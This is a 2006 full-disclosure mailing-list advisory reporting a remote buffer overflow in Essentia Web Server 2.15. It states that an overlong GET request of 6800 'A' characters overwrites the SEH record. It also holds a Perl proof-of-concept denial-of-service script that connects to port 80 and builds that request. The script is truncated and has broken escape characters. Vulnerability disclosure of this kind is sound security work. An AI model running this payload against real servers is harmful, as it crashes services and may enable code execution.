-=[--------------------ADVISORY-------------------]=-
Essentia Web Server V 2.15
Author:CorryL x0n3-h4ck.org
-=[----------------------------------------------------]=-
-=[+] Application: Essentia Web Server
-=[+] Version: 2.15
-=[+] Vendor's URL: http://www.essencomp.com
-=[+] Platform: Windows
-=[+] Bug type: Buffer overflow
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Reference: www.x0n3-h4ck.org
-=[+] Virtual Office: http://www.kasamba.com/CorryL
..::[ Descriprion ]::..
Providing enhanced Web Application and Communication Services, this is a high performance scalable web server that supports thousands of virtual servers.
..::[ Bug ]::..
This software is affection from a buffer overflow
what it would allow an attacker to perform arbitrary code
on the system victim.
Sending a GET+Ax6800 request, he would succeed
to write above the seh point.
..::[ Proof Of Concept ]::..
#!/usr/bin/perl
use IO::Socket;
use Getopt::Std; getopts('h:', %args);
if (defined($args{'h'})) { $host = $args{'h'}; }
print STDERR "n-=[ Essentia Web Server 2.15 Remote DOS Exploit]=-n";
print STDERR "-=[ Discovered By CorryL corryl80 at gmail.com ]=-n";
print STDERR "-=[ Coded by CorryL info:www.x0n3-h4ck.org ]=-nn";
if (!defined($host)) {
Usage();
}
$dos = "A"x6800;
print "[+] Connect to $hostn";
$socket = new IO::Socket::INET (PeerAddr => "$host",
PeerPort => 80,
Proto => 'tcp');
die unless $socket;
print "[+] Sending DOS byten";
$data = "GET /$dos rnrn";
..::[ Workaround ]::..
nothing
..::[ Disclousure Timeline ]::..
[30/10/2006] - Vendor notification
[04/11/2006] – No Vendor Response
[04/11/2006] - Public disclousure
*********************
Alice BASIC: mail, antivirus, antispam e invio allegati fino a 2 GB!
Per maggiori informazioni vai su: http://adsl.alice.it/servizi/alicebasic.html
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061104/e060dd56/attachment.html